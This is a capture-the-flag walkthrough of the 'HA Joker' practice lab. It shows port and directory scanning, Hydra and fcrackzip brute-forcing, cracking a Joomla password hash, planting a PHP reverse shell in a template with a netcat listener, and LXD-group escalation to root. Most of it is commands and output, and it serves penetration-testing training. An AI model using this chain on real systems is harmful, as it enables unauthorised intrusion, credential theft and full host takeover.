🃏HA Jocker CTF

We have developed this lab for the purpose of online penetration practices. Solving this lab is not that tough if you have proper basic knowledge of Penetration testing. Let’s start and learn how to breach it.

1.Reconnaisance

1.1 Nmap

Using nmap to scan and identify open ports and services

nmap -Pn -A -oA nmap.initail 10.10.26.109

Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-01 09:56 IST
Nmap scan report for 10.10.26.109
Host is up (0.22s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ad:20:1f:f4:33:1b:00:70:b3:85:cb:87:00:c4:f4:f7 (RSA)
|   256 1b:f9:a8:ec:fd:35:ec:fb:04:d5:ee:2a:a1:7a:4f:78 (ECDSA)
|_  256 dc:d7:dd:6e:f6:71:1f:8c:2c:2c:a1:34:6d:29:99:20 (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: HA: Joker
|_http-server-header: Apache/2.4.29 (Ubuntu)
8080/tcp open  http    Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 401 Unauthorized
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Please enter the password.
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

Network Distance: 2 hops
Service Info: Host: localhost; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 143/tcp)
HOP RTT       ADDRESS
1   200.22 ms 10.11.0.1
2   201.05 ms 10.10.26.109

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.40 seconds

We find 3 open ports. 22, 80 and 8080 running ssh and 2 web servers respectively

`:80`

We find a static page running on joomla cms

`:8080`

We need authentication to view this.

2. Scanning

2.1 Gobuster

Directory bruteforcing using gobuster on port 80

gobuster dir -u http://10.10.26.109 -w /usr/share/wordlists/dirb/common.txt -x .txt 

===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.26.109
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              txt
[+] Timeout:                 10s
===============================================================
2022/04/01 10:07:35 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 277]
/.hta.txt             (Status: 403) [Size: 277]
/.htaccess            (Status: 403) [Size: 277]
/.htpasswd            (Status: 403) [Size: 277]
/.htaccess.txt        (Status: 403) [Size: 277]
/.htpasswd.txt        (Status: 403) [Size: 277]
/css                  (Status: 301) [Size: 310] 
/img                  (Status: 301) [Size: 310] 
/index.html           (Status: 200) [Size: 5954]                              
/phpinfo.php          (Status: 200) [Size: 94768]                             
/secret.txt           (Status: 200) [Size: 320]                               
/server-status        (Status: 403) [Size: 277]                               
                                                                              
===============================================================
2022/04/01 10:10:12 Finished
===============================================================

We find an interesting file called secret.txt

/secret.txt

Batman hits Joker.
Joker: "Bats you may be a rock but you won't break me." (Laughs!)
Batman: "I will break you with this rock. You made a mistake now."
Joker: "This is one of your 100 poor jokes, when will you get a sense of humor bats! You are dumb as a rock."
Joker: "HA! HA! HA! HA! HA! HA! HA! HA! HA! HA! HA! HA!"

We get some potential usernames; Batman and Joker
Reading the contents of secret.txt, we find some keywords hinting to 100 words of rockyout.txt for password brute-forcing
Saving the potential usernames and some of its iterations to user.txt and first 100 words and last 100 words of rockyou to first_100_pass.txt and last_100_pass.txt, respectively.

echo "Joker \nBatman \njoker \nbatman \nJOKER \nBATMAN" > user.txt

head -n 100 /usr/share/wordlists/rockyou.txt > first_100_pass.txt         

tail -n 100 /usr/share/wordlists/rockyou.txt > last_100_pass.txt

2.2 Hydra

Using the potential credential lists and Hydra to brute-force the login credentials at port 8080

hydra -L user.txt -P first_100_pass.txt  http-get://10.10.26.109:8080

Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-04-01 10:22:52
[WARNING] You must supply the web page as an additional option or via -m, default path set to /
[DATA] max 16 tasks per 1 server, overall 16 tasks, 600 login tries (l:6/p:100), ~38 tries per task
[DATA] attacking http-get://10.10.26.109:8080/
[8080][http-get] host: 10.10.26.109   login: joker   password: hannah
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-04-01 10:23:20

We get the credential joker : hannah

`:8080`

Logging in to :8080 using the obtained credentials

We find a basic joomla template

2.3 Nikto

Scanning the website for potential vulnerabilities and directories using nikto and passing in the id:password

nikto -h http://10.10.26.109:8080/ -id joker:hannah

- Nikto v2.1.6
----------------------------------------------------------------------
+ Target IP:          10.10.26.109
+ Target Hostname:    10.10.26.109
+ Target Port:        8080
+ Start Time:         2022-04-01 10:27:18 (GMT5.5)
----------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type.
+ / - Requires Authentication for realm ' Please enter the password.'
+ Successfully authenticated to realm ' Please enter the password.' with user-supplied credentials.
line: /administrator/
+ "robots.txt" contains 14 entries which should be manually viewed.
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.46). Apache 2.2.34 is the EOL for the 2.x branch.
+ /backup.zip: Potentially interesting backup/cert file found. 
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ DEBUG HTTP verb may show server debugging information. See https://docs.microsoft.com/en-us/visualstudio/debugger/how-to-enable-debugging-for-aspnet-applications?view=vs-2017 for details.
+ Uncommon header 'tcn' found, with contents: choice
+ OSVDB-3092: /web.config: ASP config file is accessible.
+ OSVDB-8193: /index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc: EW FileManager for PostNuke allows arbitrary file retrieval.
+ OSVDB-3092: /administrator/: This might be interesting.
+ OSVDB-3092: /bin/: This might be interesting.
+ OSVDB-3092: /includes/: This might be interesting.
+ OSVDB-3092: /tmp/: This might be interesting.
+ OSVDB-3092: /README: README file found.
+ OSVDB-3092: /LICENSE.txt: License file found may identify site software.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /htaccess.txt: Default Joomla! htaccess.txt file found. This should be removed or renamed.
+ /administrator/index.php: Admin login page/section found.
+ 6544 items checked: 0 error(s) and 20 item(s) reported on remote host
+ End Time:           2022-04-01 10:46:51 (GMT5.5) (1173 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

We get two interesting paths /robots.txt and /backup.zip /backup.zip found
/robots.txt

Usually robots.txt is used to prevent search engine indexing. We can find some more interesting directories through this./administrator looks promising
/backup.zip

We can download the backup.zip file, but it is password protected

unzip backup.zip 

Archive:  backup.zip
   creating: db/
[backup.zip] db/joomladb.sql password:

2.4 Fcrackzip

Fcrackzip is a tool used to brute-force the password of a password protected zip file

fcrackzip -b -D -u backup.zip -p /usr/share/wordlists/rockyou.txt                                                                        

PASSWORD FOUND!!!!: pw == hannah

Unziping backup.zip using the password hannah, we get two directories, db and site.This is similar to the directory structure found inside the victim machine.
Viewing joomla.sql in the db directory, we get some potential usernames and password hash.

cat joomladb.sql   

===================
LOCK TABLES `cc1gr_users` WRITE;
/*!40000 ALTER TABLE `cc1gr_users` DISABLE KEYS */;
INSERT INTO `cc1gr_users` VALUES (547,'Super Duper User','admin','admin@example.com','$2y$10$b43UqoH5UpXokj2y9e/8U.LD8T3jEQCuxG2oHzALoJaj9M5unOcbG',0,1,'2019-10-08 12:00:15','2019-10-25 15:20:02','0','{\"admin_style\":\"\",\"admin_language\":\"\",\"language\":\"\",\"editor\":\"\",\"helpsite\":\"\",\"timezone\":\"\"}','0000-00-00 00:00:00',0,'','',0);
/*!40000 ALTER TABLE `cc1gr_users` ENABLE KEYS */;
UNLOCK TABLES;
=========================

Saving the hash to pass_john

2.5 John

Using john to crack the password hash

john --wordlist=/usr/share/wordlists/rockyou.txt pass_john.txt 

Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
abcd1234         (?)
1g 0:00:00:08 DONE (2022-04-01 11:21) 0.1128g/s 115.8p/s 115.8c/s 115.8C/s cassandra..bulldogs
Use the "--show" option to display all of the cracked passwords reliably
Session completed

john --show pass_john.txt

?:abcd1234

We get the credentials admin : abcd1234 which can be used to login to the /administrator to get admin access to the joomla CMS.

3.Gaining Access

3.1 PHP-Reverse Shell

Uploading php-reverse shell from /usr/share/webshells/php/php-reverse-shell.php in index.php in template "beez3".(Change the ip to tun0 ip).
Save the file and run the reverse-shell by clicking on template-preview

Start a netcat listener on the attacker system; capture and stabilize the shell

 nc -lvnp 1234
 
listening on [any] 1234 ...
connect to [10.11.66.165] from (UNKNOWN) [10.10.7.240] 35458
Linux ubuntu 4.15.0-55-generic #60-Ubuntu SMP Tue Jul 2 18:22:20 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 21:52:14 up 42 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data),115(lxd)
/bin/sh: 0: cant access tty; job control turned off

$ python3 -c 'import pty;pty.spawn("/bin/bash")'

www-data@ubuntu:/$

Using the id command, we find that the user www-data is a part of the group lxd

www-data@ubuntu:/$ id

uid=33(www-data) gid=33(www-data) groups=33(www-data),115(lxd)

4. Privilege Escalation

4.1 LxD Privilege Escalation

Linux Container (LXC) are often considered as a lightweight virtualization technology .Linux daemon (LXD) is the lightweight container hypervisor. LXD is building on top of a container technology called LXC which was used by Docker before.
A member of the local “lxd” group can instantly escalate the privileges to root on the host operating system. This is irrespective of whether that user has been granted sudo rights and does not require them to enter their password. You can read more about it here.
In order to take escalate the root privilege of the machine you have to create an image for lxd thus you need to
- Download build-alpine to your attacking machine and transfer the image to the host
- Import the lxd image to the target, initialize it in a new container and mount it to the /root directory
Cloning the alpine image from this github repository and starting an http server to transfer it to the target.

git clone https://github.com/saghul/lxd-alpine-builder  

Cloning into 'lxd-alpine-builder'...
remote: Enumerating objects: 50, done.
remote: Counting objects: 100% (8/8), done.
remote: Compressing objects: 100% (6/6), done.
remote: Total 50 (delta 2), reused 5 (delta 2), pack-reused 42
Receiving objects: 100% (50/50), 3.11 MiB | 2.53 MiB/s, done.
Resolving deltas: 100% (15/15), done.

cd lxd-alpine-builder  

ls                                                                                                             
alpine-v3.13-x86_64-20210218_0139.tar.gz  build-alpine  LICENSE  README.md

python3 -m http.server

Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

Downloading the image from the attacking machine to the target in the /tmp directory.

www-data@ubuntu:/$ cd /tmp

www-data@ubuntu:/tmp$ wget http://10.11.66.165:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz

--2022-04-03 22:13:55--  http://10.11.66.165:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz
Connecting to 10.11.66.165:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3259593 (3.1M) [application/gzip]
Saving to: 'alpine-v3.13-x86_64-20210218_0139.tar.gz'

alpine-v3.13-x86_64 100%[===================>]   3.11M   967KB/s    in 3.3s    

2022-04-03 22:13:59 (967 KB/s) - 'alpine-v3.13-x86_64-20210218_0139.tar.gz' saved [3259593/3259593]

Importing the image to the system as myimage

www-data@ubuntu:/tmp$ lxc image import ./alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimage

www-data@ubuntu:/tmp$ lxc image list

lxc image list
+---------+--------------+--------+-------------------------------+--------+--------+-----------------------------+
|  ALIAS  | FINGERPRINT  | PUBLIC |          DESCRIPTION          |  ARCH  |  SIZE  |         UPLOAD DATE         |
+---------+--------------+--------+-------------------------------+--------+--------+-----------------------------+
| myimage | cd73881adaac | no     | alpine v3.13 (20210218_01:39) | x86_64 | 3.11MB | Apr 4, 2022 at 5:24am (UTC) |
+---------+--------------+--------+-------------------------------+--------+--------+-----------------------------+

Initializing the image with the name ignite to have root permissions

www-data@ubuntu:/tmp$ lxc init myimage ignite -c security.privileged=true

Creating ignite

Mounting the / folder of our target to /mnt/root of the image and starting it

www-data@ubuntu:/tmp$ lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true

Device mydevice added to ignite

www-data@ubuntu:/tmp$ lxc start ignite

Executing bash on the image

www-data@ubuntu:/tmp$ lxc exec ignite /bin/sh

~id
uid=0(root) gid=0(root)

moving to the /mnt/root directory where we mounted our target and finding the final.txt flag

cd /mnt/root

/mnt/root ls

ls
bin             lib             root            usr
boot            lib64           run             var
dev             lost+found      sbin            vmlinuz
etc             media           srv             vmlinuz.old
home            mnt             swapfile
initrd.img      opt             sys
initrd.img.old  proc            tmp

/mnt/root cd root

/mnt/root/root ls

final.txt

/mnt/root/root cat final.txt

PreviousCyborg NextIce

Last updated 3 years ago